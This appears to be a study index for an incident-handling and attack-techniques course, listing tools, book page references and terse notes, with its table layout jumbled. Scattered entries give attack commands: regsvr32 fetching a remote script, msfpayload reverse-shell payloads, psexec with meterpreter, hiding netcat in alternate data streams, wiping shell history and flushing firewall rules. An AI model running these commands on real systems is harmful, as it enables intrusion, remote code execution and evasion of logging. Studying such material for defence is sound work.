Professional Documents
Culture Documents
4 116, 147 free code to re-add the system call table export if removed as is in
ActiveX Redhat 8/later
5 190 Active Browser content
Add N Edit Cookies 4 144 free firfox plugin to modify cookies
47-49, 51-52, How it works; ARP Cache Poisoning; Defenses
Address Resolution Protocol 3 56, 84-85, 93
(ARP)
6 17 NO ARP cache poisoning!could turn into DOS
addsyms free code to re-add the system call table export if removed as is in Redhat 8/later
Adore 5 65 Kernet Rootkit / listens on a port
Advanced Intrusion Detection 1 258
file integrity checker (~TripWire)
Environment (AIDE) 5 67
Aggressive Mode 4 26
VPN and others use IKE, exchange new keys quickly across the network
Airbase-NG 2 68 Started by Easy-Creds -> creates AP
wireless sniffer for cracking WEP keys, need to snif 50-1000mb to
Aircrack-ng 2 64 success
AirDefense 2 75 Identify War Driving
AirMagnet 2 75 Identify War Driving
Airopeek (Omnipeek) 2 64 wireless specific sniffer
Alternate Data Streams in NTFS if file is moved,hidden file is moved along,smbclient can get data from
5 105
Windows ADS,dir /r
Alternate Data Stream .exe type c:\tools\nc.exe > c:\tmp\test.txt:nc.exe, start
Example 5 110
c:\tmp\test.txt(xp),use wimic
Alternate Data Stream Notepad 5 108-109 notepad c:\tmp\test.txt:hidden.txt
Example
Alureon Capabilities creates RC4 encrypted file sys at end pf HDD.config.ini,FileDownload,InjectorAdd
Alureon/TDL Rootkit Family kern-mode,for hiding,dodging AV,alters wind file sys drivers:atapi.sys/iastor.sys
Anti-Reverse Engineering for 5 19 pack exe so that it runs decompresses and then you get the main exec
Execs(wind)
1 53, 119
AntiVirus (AV) 4 170 prevent instalation if DoS
5 9 Can Identify App-Level Trojan Horse Backdoor
1 13, 256
Apache
4 110,124 ModSecurity offers solid filtering features
API Hooking 5 45, 48 Change API calls for running procs to hide
APPEVENT.EVTX 5 114 one of the main Event Logs
APPLICATION.LOG 5 114 on of the primary temp event logs
Application Level Trojan Client-sever archi, Poison Ivy, VNC, Dameware, Sub7, GhostRAT,
5 9-16
Backdoors Blackshades
archive.org 2 39 similar to google Wayback machine
Armitage 3 113 Metasploit GUI inteface
arp -a / arp -a sau -e 3 85 show ARP entries in Win / Linux
ARP-cache-poisoning 4 24 Map IP (network layer) to MAC (Data link layer)
ARP Cache poisoning in session arp spoof both sides(org and dest) then hijack
Hijacking
ARP inspection prevent attackers to assume IP addresses
ARP lab 3 70-77
Arpspoof 3 51-52 manipulate IP to MAC. Feeds false ARP msgs into LAN. Traffic is
pointed to atkr
ARPWatch 3 85 tool to check across the network for sniffing and session hijacking;
Monitors LAN
Buffer Overflow exploit best 3 107 make the exploit small enough to fit buffer,avoid terminators like 0x00
practice
Buffer Overflow vulnerable commands: -strcpy -strncpy -strcat -sprintf -scanf -fgets -gets -getws
3 103
commands -memcopy -memmove
Building a Team 1 30
91, 93-95, 104,
Burp Proxy 4 146 find and alter HTTP requests in real time
hash calculator,war driver,sniffer for passwds,win hash dumper,RSA
4 24 token gen…
Cain
Cain has a gui and is used to gather info abt sys.Abel in
4 10, 16-33 background,dumps info
Pre: remove LANMAN hases from local sys; Disable LANMAN
Cain Defences 4 31 challengi/response auth across net(use NTLMv2; Enforce strong pass;
use Pass Policy; Implement SYSKEY; Protect SAM db
cracks Microsoft LANMAN,NT hash (stored in SAM and AD); LM
Cain as password cracker 4 25 challenge/response; NTLMV1&2 challenge/response; Kerberos5 auth
(used for auth across network).
CISCO,APOP-MD5,RIPv2-MD5,OSPF-MD5,VRRP-HMAC-96,VNC 3 DES,
Cain as password cracker 2 4 26 RADIUS,IKE Pre-shared keys,server 2k,Mysql 2k3
record a stations MAC address and it’s corresponding switch port location. Timestamp for
CAM Table (switches) the entry is recorded and it’s VLAN assignment
hash of the return pointer to protect it; creates hash of the return
canary 3 124 pointer and checks after func call; 3 types: random, terminator and
XOR
case insensitive - Windows 4 178 tasklist |find /I /c "notepad.exe"
case insensitive -Linux 4 184 ps aux | grep xeyes
cat (linux) 1 220 cat [OPTION] [FILE]...create single or multiple files.view contain of
file,concatenate files,redirect output in terminal or files
cat /etc/passwd 1 220 see contents of a file (linux)
cat ~/test_file 1 220 see content of a file
Cdoor - Non Promisc Sniffing match pattern of packts to ports,if pakts=proper port,temp listen 5002 with shell
Backdoor
Cdoor - Non Promisc Sniffing
SYN pakts to Ports X,Y and Z,after Z temp listener on 5002, conect with netcat
Backdoor
Certificate Authority (CA) 3 60-61, 65, 84
CGI How it works(same for request to run CGI is in URL requested of server. POST and GET.
PHP,ASP,JSP)
CGI program interface for executeable programs with web pages.
CGI/Web scanner def Same as Vulnerability scanner def + chrooted environment(can only see part of file
don’t delete files till case closed,ctrl access evidence,law enfore to sign
Chain of Custody (Identification) 1 97 for evidence
Covert_TCP 5 127-131, 134 trans info by entering ASCII in TCP/IP fields:IP ID,TCP init Sqn nr&TCP
Ack Sqn nr
Covert_TCP Bounce Mode Client(SYN)spoofed src_ip of receiver->bounce server(SYN-ACK/RESET)->Rec_Serv
Covert_TCP Modes IP ID:drop ASCII in IP ID field.SQn mode:Drop ASCII in ISN in the 3 way handsh
Covert_TCP Receiver /covert_tcp -dest -source - source_port -dest_port - server - file
CoWPAtty 2 65 sniffs 4 way handshake and lunches crypto attack against PSK
cp hachstuff.exe
5 104 to hide files in a stream behind normal files
notepad.exe:stream1.exe
sets its priority to 16(highest)windows sets all other apps to 15.
CpuHog 4 154 Pre:Patch sys.Ide:single proc at 100%.Con:kill.Era:Remove
prog.Rec:reboot,msconfig
crafted pachet can cause DOS for webserver, formated in a way not expected by dev
create non-root account 1 222 useradd -d [Home_dir] [login] -> useradd -d /home/fred fred
CreateRemoteThread 5 45 Create thread so dll can run:CreateRemoteThread,freeup space
1 253 #crontab -l -u root. Look for cronjobs scheduled by root/UID 0
crontab
5 44 altered to start malw software at startup, hiden
76, 110, 113- BeEF is a XSS Framework and delivers malicious payload; based on
4 126, 128-141, relecting input back to user.bounce code off the server back to
Cross-Site Scripting (XSS) 147, 150 browser
6 59 example
Cross-Site Scripting - admins atk 4 119
browser can be exploited while viewing logs by admin
Cross-site scripting Ide:IDS logs,watch for coded info.Con:Add filter.Era:Remove atk
4 126
Defenses:Ide,con.. data.Rec:anti-fraud
Same as SQL injection.Filter user input and output html.allow only
Cross-site scripting Defenses:Pre 4 124 alpha numeric
Cross-site scripting Defenses:Pre disable scripting(with impact),IE 8 and new chrome has xss
4 125
2 filter,FireFox NoScript
find vuln site,trick usr to click link,code transmitted to vul
Cross-site scripting How it works 4 116-117 site,reflected&ran on brow
Cross-site scripting How to 4 114 url embedded in email or on third party site,message boards
launch
Cross-site scripting Internal Sys
4 119 scan int netwk,from browser exploit home router,Jikto.
Scanning
73,153-
154,163-
Denial of Service (DOS) 4 171,173,175- Bot functionality; DoS attacks and Types
176,181,183
Targa, Xcrush, spike, Toast.
Denial of Service (DOS) Suites 4 161 Exploit:bonk,jolt,land,nestea,newtear,syndrop,teardrp
df 1 257 check available HDD space
2 64 ASLEAP tool-> directory attack agains LEAP authenticaion
Dictionary attack 4 10, 11, 27 Testing all words in a directory or a word file
6 49 C:\> enum -D -u [user] -f [wordfile] [target]
Dig (UNIX- instead of 2 26 dig @[DNS_server_IP][target_domain] -t AXFR
nslookup) 6 29, 47 Zone Transfer attempt: #dig @10.10.10.45 target.tgt -t AXFR
dir command to list file streams but not display or print their content
Add NoLMHash key to registry; LMCompatibilty reg value 3 or 5 (stop
Disable LANMAN Authentication 4 32 sending LANMAN challenge/response across network).
Disaster Recovery (DR) 1 10 Part of Incident-Handeling plan;
Distributed Denial of Service 2 14 Spread using Worm techniques
(DDoS) 4 154, 163 DoS attacks and Types; mostly launched by botnet
Allocate space:VirtualAllocEx,write name&code:WriteProcessMemory
call
DLL Injection 5 45
Create thread so dll can run:CreateRemoteThread,freeup
space:VirtualFreeEx fn
force exe to accept DLL.Hooking:atk undermine running proc
DLL Injection and API Hooking 5 45 interacting windows
DMCA Digital Millennium 2 9 copyright protection and prohibition against reverse engineering
Copyright Act
send small spoofed (60 byte) dns query to many DNS servers,512 bytes
DNS Amplification 4 156-159 to victim. Is dificult to block source because UDP are easy to spot
DNS Cache Poisoning Defense 1 Pre:Randomize src ports&query IDs,patch DNS servers and keep them up to date.
DNS Cache Poisoning Defense 2 Pre:Configure split DNS;internal dns server for internal queries, ext for ext queries
DNS Cache Poisoning Defense 3 Pre: Split-Split DNS;outside machine resolves int machines using ext-ext dns server
DNS Cache Poisoning Defense 4 Pre:Use SSL (https),Harden OS,use file integrity checker,IDS/IPS.Digitally sign DNS recs soon!
DNS Spoofing 3 57-60 Remote posibility(between victim & DNS server); Redirecting traffic;
BETTERCAP; redirect graph
Dns to hash lookup tool (ISC) send DNS TXT record with hash in it, reponse with file details.dig +short…."cmd.exe..
DNSCat 3 11 Netcan functionality over DNS
1 146, 148, 154 Lab DNSCat2
DNSCat2
5 132 Tool to use DNS protocol for C2
DNSSEC 3 digitally signed DNS records to prevent spoofing
DNSStuff.com 2 50 Web-based Recon/Attack tool
Domain Name Registration 2 18 Req: Postal add, Phone nr, Name of POC, Authoritative DNS ; Useful
for Social engineering, war dialing, war driving, scanning
Local(process kill,crash,CpuHog)and Network(malformed pakt&packet
Dos attack - Types 4 154 flood)
Drive Duplication 1 111 Hardware tool for bit-by-bit copy
Dshield sensor network 1 15 40k sensors globaly, collecting info on scans & attacks vs ports
2 6 Injects pakets to redirect traffic to it
Dsniff
3 63-64 Active Sniffer
Dsniff Components Dsniff,arpspoof,msgsnarf,DNSSpoof,filesnarf,Webmitm,macof,mailsnarf,sshmitm
67 allows attacker to create evil wireless AP which he has full control over
EASY-CREDS 2
Aircrack-Ng,DMESG holds DHCP logs,SSLStrip,Ettercap and URL Snarf
68 for hijacking
Ebowla 3 146 Environmental Keyed Payloads +Golang language(hard for AV)
Editing Accounting Entries in utmp format,editing
5 90
Unix tool:mary.c,cloak.c,remove,logwedit.c,wtemped.c,wzap.c
/etc/syslog.conf (to see where logs
Editing Log Files Unix 5 85 stored)./var/log/secure,messages.httpd logs
boot into another OS(linux),tool that can edit SAM proves its
Editing logs with physical access 5 115 possible.No release yet
shell is written on exit,therfore Kill -9 [pid],kill -9 bash,unset HISTFILE
Editing Shell History 5 87 then kill -9 $$
editors (linux) 1 219 vi,gnu-emacs,pico,mcedit,nano,gedit eg. (gedit test_file)
Package containing the NOP sled,the attacker machine code and
Egg 3 109 Return Pointer
Elastic search amazon
vulnerability allows u to do arbitrary read of files. Linuxtime 2014/2015 exploited it
Email-threats/hate speech 1 168 go through email evidence only and let physical sec/fbi handle rest
Emergency Comm plan 1 33 call list,conf bridge,IR contact cards,test ypur process
1 41 Forensic software
EnCase
3 133 Has Parser known flaws;atks can execute cmds or crash apps
Enchanced Mitigation Experiance 3 122 Helps address vulnerabilities in 3rd party software (Microsoft)
Toolkit (EMET)
-S [targetIP]: pulls list of shares, -U:users, -G:groups, -P:password
2 139 policy
Enum
6 16, 33, 49 Detecting users and groups, and password guessing (Win)
enum -D -u [User] -f [wordfile] Directory attack against a target; password guessing for SMB session using a directory
2
[TargetIP] file
SWITCHes:-S: pulls list of shares, -U:users,-G:groups,-P:password
enum -switch [TargetIP] 2 139 policy
enum -u [UserName] -p 2 139 provide an authenticated SMB session to extract info from targe
[password] -G [TargetIP]
Exploitable! 3 104
Tool released by Microsoft that extimates how exploitable a flaw is
explorer.dll (rootkit hooking) 5 48 rootkit injects it in explorer.EXE to do API Hooking
3 168 target to migrate malicious processes
explorer.exe
5 39, 46 process map; it’s a common target of injection;
Extension Mechanisms for DNS locate dns servers that do recursive lookup,respond with 4K byte txt
4 157, 159
(EDNS) Amplification attacks which is cached
Extortion 2 11 DoS extorsion
EyeWitness 2 98 Takes scrnshots of webstes,VNC,RDP servers and all detected
webservers
Fast Flux (botnets) 4 69-71 Attacker swaps between diferent systems to evade detection
Fast Flux Techniques 4 69 Adds extra layer of obscurity; rapidly swapping resources among
different systems to avoid take down
Eg in phishing:Spam
bot emails
Fast Flux Techniques How it Round-robin dns records with 3-10 min TTL populated with
victim,victim clicks
works . proxies.double flux
on link,Round robin
DNS
exponential,spread shape of a gold stick,Warhol 99% in 15mins,Flash
Fast Spreading Worms 4 60 30seconds
fg 1 227-228 bring job in foreground
1 57 System-lever detects fgdump/netcat
Fgdump
Finding Hidden streams 5 106 Use third party tools like LADS,streams,streams shell extension utility
finding files (linux) 1 218 locate [prog_name], updatedb(if not up to date), find / -name whoami
Format string example - windows sort "%d%d%s%s%n", sort command should crash
Format Srting attacks Defense pre:Use format strings in all printf,sprintf,fprintf and snprintf function calls&patches
Format Srting attacks Defense 2 Ide: Same as buffer overflow
Format String Attacks misuse of printf,sprintf and snprintf,atker can read&overwrite info from mem
Format string stack input arguments are pushed on the stack in reverse order
Format string stack view Example of adding a value (eg. 5) to an address location eg. 0xbffffac0
Fortify Source Code Analyzer 3 127 Commercial cod-analysis tool
Foundscan - McAfee's 2 119 Commercial Vulnerability scanner
Frag3 multiple parallel virtual defrag buffer
Fraggle relies on UDP packets to lunch flood against a target.smurf is with ICMP
Fragment Overlap Attack 2nd fragment lies about offset in order to overlap and replace part if first frag
Fragmentation pronlem for IDS IDS doesn’t know how the frags will be assembled, diff OS's handle this differently
similar to fragrouter but flexible, includes a lang for def specific twisted frag atk
FragRoute Diff: has the ability to route frag IP pack from remote host
tool with multiple ways to frag pkts,sits on same machine as attacker,can't route
Fyodor nmap -n -sP - o Smurf.log '209.12.*.63,127,191,255'
Gcat 5 133 C2 traffic over Gmail; bypass DLP/IDS/IPS/Firewalls
General Electric Comprehensive 4 36, 38 General info about account owner: name, phone nr, address etc
Operating Supervisor (GECOS)
Generate new file (Stego) hidden msg can gen new file.used in CGI's.Eg input text used to gen fractals
Generic Route Encapsulation Some bots can send IP packets via GRE tunnels to infected systems, to
4 73
(GRE) fw the packets as if originated from the victim
GET /./CGI-BIN/broken.chi
HTTP/1.0 /./ directory insertion - Way Nikto Avoids IDS
Google Hacking Database (GHDB) 2 35, 41 index of search queries (we call them dorks) used to find publicly
available information
Google Maps API 2 36 Maps is good for location images
GrammaTech 3 127 Commercial code-analysis tool - C; C++
Gratuitous ARPs 3 49, 84 Sending ARP when no one asks. You can flood switch/poison arp cache
239-241, 254, finds items matching a given condition eg. cd /etc,grep root *.find root
1 264, 266 from all files
72 -i> case-insensitive search; -B n -A n> Before and after "n";
3
grep 71-76 eg. Netstat -nap | grep 777, ps aux | grep bash
4 174, 183-188 -c>count nr of lines of output: [cmd] | grep -i -c [text]
76-78, 95, 100,
5 lsof -Pi | grep 8080
141
Group Policy Object (GPO) 4 33 Used to implement rules to users on the network
GRR Rapid Response 1 39 IR framework focused on remote live forensics, waits until system is
back online, couples with Rekall
hacking to make a political point.website tampering,manupulacting
Hacktivism 2 10 finace,remailers
Hashcat (password cracker) 4 10 Fast pass cracker, users CUDA video drivers for faster pass crak
162 hasdump:dumps passwords from memory; run hashdump: dumps
3
hashdump and run Hashdump (Meterpreter) from registry
6 51 Metasploit commands
HBGary's fastdump 5 22 memory dump tool
HEADER: ../../cgi-bin/broker.cgi Way Nikto Avoids IDS - Premature URL ending, include ref to CGI script in header
HTTP/1.0\r\n
heartbeat 1 151 interval a backdoor reconnects to get cmds from atkr
HearBleed (Powerbleed tool) 3 65 malformed SSL heartbeat reqs bleed memory out of a SSL-enabled
Apache webserver
Hidden Unix files location 5 83 /tmp,/dev,/etc, /usr/src,/usr/local/man.
Hidden Unix files location 2 5 82 name files starting with ". ",".. ","… "," "
Hiding Components in Linux 5 44 hide files,processes,network usage&events.ls,
find,du,ps,top,killall,modify crontab
type hackstuff.exe > notepad.exe:stream1.exe ; cp hackstuff.exe
Hiding Files in NTFS Windows 5 104 notepad.exe:stream1.exe
newer,by anonymous,the js can access more than one
High Orbit Ion Cannon (HOIC) 4 169 page,multithreaded,easy
Hijacking + Responder 3 79-86, 88
histogram Normal text non uniform. Encrypted text has flat hostogram; A chart showing the
. frequeency of each letter used in a file
HKEY_CURRENT_USER (HKCU) 1 69, 85
HKLM\System\CurrentControlSet
\Control\Lsa\EveryoneIncludesA 0/1; Null Sessions have no special rights / are part of Everyone group
nonymous
HKLM\System\CurrentControlSet
\Control\Lsa\RestrictAnonymous 0/1 ; Null Sessions can/can't enumerate names
SAM
Hop Limit (IPv6 Header bit) 2 81, 83 Hop limit for IPv6 and TTL for IPv4
Host Info (HINFO) 2 25 generated when NSLOOKUP uses set type=any
Complete 3way hand&send GET.send huge normal kinda traffic from
HTTP Flood 4 167 bots
Using pen test techniques to hunt attacker that may have used the
Hunt Teaming 3 128 same method
2 74 screenshot example ; Similar to Rubber Duckie
Human Interface Deices (HID)
3 5 USB sticks with auto-keyboards, download-run malware,steal…
Human Resources 1 170 Monitor a specific user only if written request from HR receivd
"Word mangling".substitue characters from dictionary
Hybrid Attacks 4 13, 27 words.eg.o=0,s=$,a=@
hides data in win,lin exe.msg blowfish encrypted & put in exe.no diff
Hydan in size&func
Hydan Efficiency Rate and hides 1 out of 150B,distribution of the math funcs not altered so it can
Detection be detected
5 148, 150-153 encrypts msg & hides,uses polymorphic coding tecniqs to rebuild exe.
Hydan How it works A+B = A-(-B)
rebuilds exe from ground up switching ADD and SUB.Result is same
Hydan in action size
Hydan Uses hide data,watermark,sign exe,polymorphic sig evasion(not yet)
Hydan 6 58 to hide and receive data - commandas
dont support full brute force.Dictionary support,most
Hydra Password guessing 4 8 protocols:rdp,smb.htts,ssh
82 Echo Req for a response to identify available targets
ICMP 2
83 Time Exceeded msg comes back if TTL is too small
120, 124-125,
ICMP + Tunnel 5 131 can carry Shell traffic, ICMP messages can carry Covert_TCP
ICMP Timestamp 2 82 Used for network maping via Nmap
Identification 1 48-61 Goal: gather events,analyze and determine if we have an incident
Identification Where it occurs 1 53 Network Perimeter; Host Perimeter; System lvl; Application lvl
a threat from an entity with access to your data. Employee & business
Insider threat 1 174 partners. Well-intentioned/disgruntled/unnoticed employee.
Insider threat Assesment 1 177 Identify equipment ,OS,IP,http activity,IDS monitor, Email monitor
checklist
Insider threat assesment 1 179 Review the data,summarize findings,interview suspect
checklist (3)
Insider threat Assesment 1 178 monitor called nr's,background check,work habits, after hours visit
checklist(2)
Insider threats - types casual&intentional(destructive/non-destructive)
InSSIDer 2 61-62, 77 used to descover SSID's, doesn't help if cloacked, use wellenreiter
instead
Instruction Pointer 3 97-98, 104-105 CPU uses instruction pointer to point to location in memory where
instruction is
integrity-checking 5 67, 118, 155 Tripwire,OSSEC,AIDE
Intellectual property 1 181 the primary distinction bw competitors from brand to "secret formula"
IP address spoofing with Sqn nr DOS original sys so that it wont send RST,keep guessing ISN. 1 way communicatn
guessing
IP Fragmentation Analysis frag 21223:1480@0+
IP Fragmentation Defense Pre:Reassmeble before decission,FW,update IDS/IPS,HIPS/HIDS.Ide:IDS sig,IPS
IP Identification field 5 128
Covert_TCP can send info with ASCII data in IP ID, TCP' ISN & Ack SN
IP packet header 2 81 IPv4 and IPv6 header
IP personality Tool that can make a linux machine look like any other type of system
1 203 iptables -F (disable firewall)
2 151 Sudo ifconfig eth0 10.10.75.1 netmask 255.255.0.0
iptables
3 28 ifconfig eth0 10.10.75.1/16
6 8 Disable firewalls Linux (+Windows)
Kansa(detection tool) 1 140-144 Tool written in Powershell; create stacked analysis of installed
software in environment- LONG TAIL; focus on interested procses; Uses
powershell to pull info across many hosts and has good statistical tools
listens for client probe requests,pretends to be the SSID,exploits with
metasploit
Karmetasploit 2 69-71
fake services:dhcp,dns,pop3,web server.Pretend to be SMB server &
gets ur pass
ring 0&3 in x86 archi.user proc-->sys lib-->CPU interupt-->sys call
Kernel 5 51 table-->Kern code
Kernel File on Hard drive overwrite kernel file:vmlinuz and Win32.sys &
5 57
Modification ntoskrnl.exe(windows).bypass ntldr
Kernel Loadable Module & used in linux to add new HW/features.In windows=drivers.create
5 55
Device Drivers malicous driver
1 258 chkrootkit looks for anomalies on system made by user/kernel m
Kernel-mode rootkit 7, 50, 52-56, 58,
5 60-61, 64-65,
67-69, 82
Config Lockdown:Prevent from getting root,Harden sys,use good
Kernel Mode Rootkit Defenses 5 64 security template
pre:config lockdown,protect syscall table
Kernel Mode Rootkit Defenses2 Protect SysCall Table:use systrace(track sys calls)HIPS,few vers don't let sys table exp
link:www.[target_company].com 2 29, 37 search on Google for all sites that link to the target
root,bin,sbin,dev,etc(passwd,shadow),home,lib,mnt,proc,tmp,usr(bin,
Linux file system structure 1 213 sbin,man),var
Pass policy,guard pass file,strong pass,use shadow pass,use
Linux Password Cracking Defense 4 40 PAM,token,kerberos
colon-separated(loginname,Encrypted pass,UID nr,GID,GECOS
Linux Password File Format 4 36 info,home,shell
Linux Password Shadow File login name,encry_pass,date of last change,min age,max age,warning
4 37
Format days…
Symmetric-key EnCryption - made to replace DES. Telnet over ICMP.Can hide as DNS
LOKI block cipher traffic using UDP port 53. Carry Shell between linux client and server
using ICMP Echo and Reply
Log Editing in Windows 5 114 main event log files: System, Security, App
long-tail analysis (Kansa) 1 140 create stacked analysis of installed software in environment
Low Orbit Ion Cannon (LOIC) 4 168-169 tool to lunch various floods.win,linux,droid,javascript for browser
-a(lists all files including hidden files); -d(list all with */); -l(long listing
148, 155, 215, format,perm,link..); -r(ists in reverse order); -s(lists file size); -t(sorts
1
ls (LS) 217, 221, 262 list by time/date) -> eg. -lrt , - la, ls /tmp, ls /dev | less, which ls, ls
-a /tmp
5 44 Rootkit can hide files by changing ls
16, 49, 50, 51, Interface-manage loc sec,dom auth,ADproc
LSASS (Local Security Authority 4 53, 59
Subsystem Service)
5 33
234,247,250,25 -i(all network connections); -p [pid](all files and ports used by running
1
lsof (list open fies) 2, 260,262-263 process);+L1(unlinked files);-P(shows ports not names)
51, 53-54, 68, supports ARP cache poisoning &multiple other injection/TCP stream
Man-in-the-Middle Framework 3 modification atks; backdoor EXEs in transit(FilePwn); ScreenShotter-
(MitMf) 83 invokes HTML5 Canvas>screenshots browser; SSLSTRIP+
Management Support Monthly report, show evidence of damge,show how other have been
1 29
(preparation) hacked
Mantech Responder 5 26 Analyze memory dumps;Compares malware with known ones
MasScan 2 97 tool to scan very large networks with thousands of hosts, quickly
payloads,encoder/decoders,NOP sled,wrapper-shellcode
Metasploit Features-Routines 3 119 creation,msfelfscan&msfpescan
metasploit launch and cd /home…framework4.9.0,source /opt/useruby193.sh,./msfconsole,show exploits
msfconsole 3 153 #ifconfig eth0 10.10.75.1/16; #msfconsole -q; show exploits
Metasploit multi/handler waits for connection:use exploit/multi/handler,set PAYLOAD..,set LHOST,exploit
Metasploit Payloads Payloads can be exported in diff formats,eg of payloads:bind shell,
3 115
. reverse shell,VNC,inject DLL,create local admin user
Metasploit Payloads -
Meterpreter 1.doesn't create a process to run shell,runs it inside exploited process; 2.doesn't touch the
. HDD,gives access by manipulating mem; 3.its own cmds, no need for executables on target;
4.dynamicaly load new modules,changing its function while in the memmory of the
.book3 exploited proc. Ability to load and interact with DLLs in real time,after exploitation occurred
.page 116
use exploit/wind../smb/psexec;set PAYLOAD
metasploit psexec 3 155, 156 win../meterpreter/reverse_tcp
metasploit search search type:exploit psexec, info exploit/windows/smb/psexec
Metasploit User Interface Select Exploit,select target,select payload or set cmd to execute,set
. 3 113 options & launch
Meterpreter 5 116 clearev , clears app,sec and sys event logs.no edit tool yet
Meterpreter - get a shell 3 163 run "shell" command to get cmd. Test using net user. Exit
uses TLS to encrypt communication; displays sys info,interact with file
Meterpreter Features 3 103, 117 sys,network and processes on target
Meterpreter Session 3 159 background,sessions -l,sessions -i [session_nr],
management
Microsoft Sysinternals 1 77, 126 Process minitor, psexec
migrate 3 164, 167-169 migrate [Pid], getpid ; migrate [PIDofCalc.exe](meterpreter)
Mimikatz 4 51 extracts/views clear-text passwords from LSASS
more command to view the contents of a stream (location and name of stream needed)
mount cdrom cd /mnt/cdrom, mount cdrom, mount /dev/cdrom, mount /mnt/cdrom
MP3Stego 5 148 hides data in .mpeg files
MS-Kerberos5 Pre-Auth 4 25 Used for auth across network
3 103, 119 scan for exe's and DLL's with vuln code (POP+POP+RETURN)
Msfelfscan & Msfpescan
5 56 can find libreries from unusual locations(servicepack/language)
3 137,138
Msfvenom
Nikto IDS Evasion - Techniques 3 NULL method, Session splicing (this is the L4 method)
Nikto password attack 2 167 can launch pass guessing attack the network; uses a directory file
1 96
Nimda
4 57-58 Mullti-exploit & Multiplatform
1 54, 56, 121
5 80,162,164-168
6 16, 31-32, 48
Nmap -A 2 108 all details,pulls banner,OS iden, traceroute,etc
nmap -n -sP -o Smurf.log to look for potential Smurf Amplifiers
209.12.*.63,127,191,255'
nmap -Source ports for scanning UDP 53, TCP 53 (DNS zone transfer), TCP 80 (most popular), TCP 443
useful for mapping not scanning,won't get past a stateful FW,can't tell
Nmap Ack Scanning 2 94 if port is open
Nmap Identifyiny addresses- Sends 4 packets to addresses.ICMP echo,TCY SYN 443,TCP ACK 80,ICMP
2 82
Sweeping timestamp
sending various packet types (eg SYN,FIN,URG,PUSH) and measuring
Nmap OS fingerprinting 2 95 response
new methods:sqn nr GCD,window size,TCP timestamp,TTL
Nmap OS fingerprinting 2nd Gen 2 96 guess,DF,Congestion. If no recon fingerprint, nmap giver instruct to
send it to insecure.org
gives reason why it believes a port is open. Eg. nmap --reason
nmap --reason 2 107 127.0.0.1
Ping swp,ARP scan,Connect scan,SYN,ACK,FIN,FTP Proxy"bounce
Nmap Scan types 2 93 attack",idle,udp,rpc
Nmap Traceroute Capability It "goes backwards".Sends pckt with right protocol to target,adjusts & determines
. TTL,decrements TLL
PAM to enforce password Pluggeable authen module use in linux,can make users auth to
complexity policy in linux 4 41 RADIUS,kerberos..
Paros Web App Manipulation Proxy tool
Parser Problems - Buffer grabs data from ntwrk & parse to App.code parsing always
3 131
Overflow vuln.Eg.Wireshark,snort
Parser problems (file&protocol) 3 134 careful with sniffers(usually installed in DMZ,data centers etc)Patch!
Defense
steal hash,take adv of LM chal/resp or NTLMv1/2 across net and hash
Pass the hash Attack 4 49 gets passed
Pass the hash Attack 4 50 Steal hash, place in memory, use for SMB
Architechture
Pre:Patch,harden,endpoint sec,HIPS,SMB only via admin
Pass the hash Attack Defense 4 52 accs.Ide:config changes..
pshtoolkit,Windw credential editor(WCE);injects hash into LSASS,
Pass the hash Attack Tools 4 51 metasploit, psexec
Passive OS finger Printing Doesn't send pkts, rather just sniffs.eg surf the website & look at the header
Passive OS finger Printing Pre:close unused ports,stateful FW.Ide:not much cos its passive but u can use IDS sig
defences
2 73
get encrypted pass,get algorithm used,encrypt many dictionary pass
5-14, 22-24, 26- and compare
4 27, 31, 33, 40, audit,improve tech controls for pass complexity
password cracking 47, 49, 139 Pre:Disable LANMAN chal/resp; no LM hashes; policy (2 factor auth);
protect SAM,SYSKEY
5 170, 189
6 16
Password Cracking methods 4 10 Directory(word list),Brute force(iterating through caracter
sets),Hybrid(a mix of 2),Tools(Cain&Abel,John,Hashcat)
2 56 pretty slow.can trigger account lockout
3 157, 173 try small nr of pass on many acc's. avoid acc lockout
pasword guessing
4 4-8, 55 in windows:SAM database and AD.In linux: etc/shadow
6 16, 35
use fgdump,cain,meterpreter hashdump,sniff,linux boot
Password Hashes 4 29 cd,ntbackup.exe
2 159 SMB Lab: Invoke-LocalPasswordSpray -Password Winter2017
password spraying
4 7 try a few passwds on many acc's on many sys. avoid acc lockout
password storing 4 5 in windows:SAM database and AD.In linux: etc/shadow
Payload to ./msfpayload win/meterpreter/reverse_tcp LHOST=[IP] X > /tmp/meterpreter.exe
executable(msfpayload)
PEBundle 5 19
PECompact 5 19
PeepNtom 2 98
People Preparation/assesment Sptoolkit and phishme: tools to create phishing campaigns for
1 20
tool assesment
1 23
Personally Identifiable
Information (PII) 4 111
5 159
phishme 1 20 tools to create phishing campaigns for employee assesment
phpBB 2 42
Picasa 2 31
Ping of Death 4 154
ping sweep determine hosts that are up in a IP range
Pivot 3 118 uses a compromised system as a launch point for other targets (eg.
Port Forwarding)
Pluggable Authentication 4 40-41
Modules (PAM)
Point of contact and POC and command comm center,secure comm.permisson for
1 35
Resources(prep) resources 5-10K
Rmt-ctl backdoor,configure server,move exe to target,control with
Poison Ivy 5 9, 14-15, 18 client.Binary,C,py
Policy - Peer Notification est policy for outside peer not,partners,you company,employees,vpn
1 26
(Preparation) with warning
aproach to incident handling,secret or notify law enf.contain&clear or
Policy (Preparation) 1 22 watch&learn
3 119
polymorphic changes it's code base in a way that it continues to execute,evades AV
4 56, 62-65
5 151, 194 XOR the code then preappend it with XOR decoder.2. X+Y=X-(-Y)
2 25, 27, 93
port 53 3 16
5 162
Port knocking backdoor technique,sniffer grabs packts to specific ports it's interested in.
Port Reporter - by Microsoft 2 102 free tool that generates logs showing port activity
Prep:Close unused ports and apply filters,stateful FW,IDS.Ide:IDS
Port Scanners-Defenses 2 100 sig,log analysis
port sentry tools 1 53 Host perimeter Detection
Portspoof Makes all ports on machine appear open with services enabled,confusing attker
portmapper 2 93
positive skew analysis 1 140
2 40
PowerPoint
3 133, 139, 141
1 140-141
82, 142, 159-
2 160
PowerShell
142, 152, 161,
3 164-165, 168-
169
PowerShell Empire 2 142
People,policy,data,software/hdwr,communications,supplies,trans,spac
Preparation Overview 1 19 e,power,docs
Reg\\[MACHINE NAME] 1 126 Comand that even works remotely to check for changes to registry
reg quert 1 69, 85, 192
1 69, 85
regedit
4 50
Registration attack register similar domain names to fool users. Eg vvindowsupdate.com
regsvr32 &scrobj.dll 3 150 regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll invoke the script
on our behalf (not run it), can take extrnl USL loc for script
1 39, 110 capture and analyze mememory on Win
Rekall 22-27, 29, 31-
5 35
rel 1 208, 212, 222,
229, 235, 239
1 167
Relay
Rootkit Backdoor Components login,rshd,sshd,inetd&tcp services are all modified.Atker can give
